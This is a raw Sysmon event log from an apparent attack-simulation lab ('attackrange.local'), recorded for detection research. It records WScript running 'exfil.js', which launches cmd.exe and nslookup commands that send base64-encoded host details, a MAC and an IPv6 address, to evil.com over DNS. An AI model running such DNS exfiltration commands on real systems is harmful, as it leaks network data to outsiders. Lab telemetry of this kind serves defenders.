10341000x8000000000000000195189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-293E-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.872{2E1864BB-17A9-629A-273E-000000005F02}33603644C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-293E-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.884{2E1864BB-17A9-629A-293E-000000005F02}1788C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-273E-000000005F02}3360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyoh.tmp 2>&1 10341000x8000000000000000195185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.857{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-283E-000000005F02}3348C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043912Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:09.714{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=792F3C7523AB7203E4753DAA0C2B48D2,SHA256=453BD4649CF414ABE7035168CC48F6F3E3AF8E280492E6FC2DA53B47AE67486C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.857{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-283E-000000005F02}3348C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.841{2E1864BB-17A9-629A-283E-000000005F02}33485036C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-273E-000000005F02}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.841{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-283E-000000005F02}3348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-273E-000000005F02}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-17A1-629A-783D-000000005F02}55525704C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-273E-000000005F02}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.839{2E1864BB-17A9-629A-273E-000000005F02}3360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyoh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.825{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljpme.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.808{2E1864BB-17A9-629A-253E-000000005F02}69327888C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-263E-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.788{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.788{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-263E-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.788{2E1864BB-17A9-629A-243E-000000005F02}72086180C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-263E-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.802{2E1864BB-17A9-629A-263E-000000005F02}2600C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-243E-000000005F02}7208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljpme.tmp 2>&1 10341000x8000000000000000195165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.772{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-253E-000000005F02}6932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.772{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-253E-000000005F02}6932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.772{2E1864BB-17A9-629A-253E-000000005F02}69327888C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-243E-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-253E-000000005F02}6932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 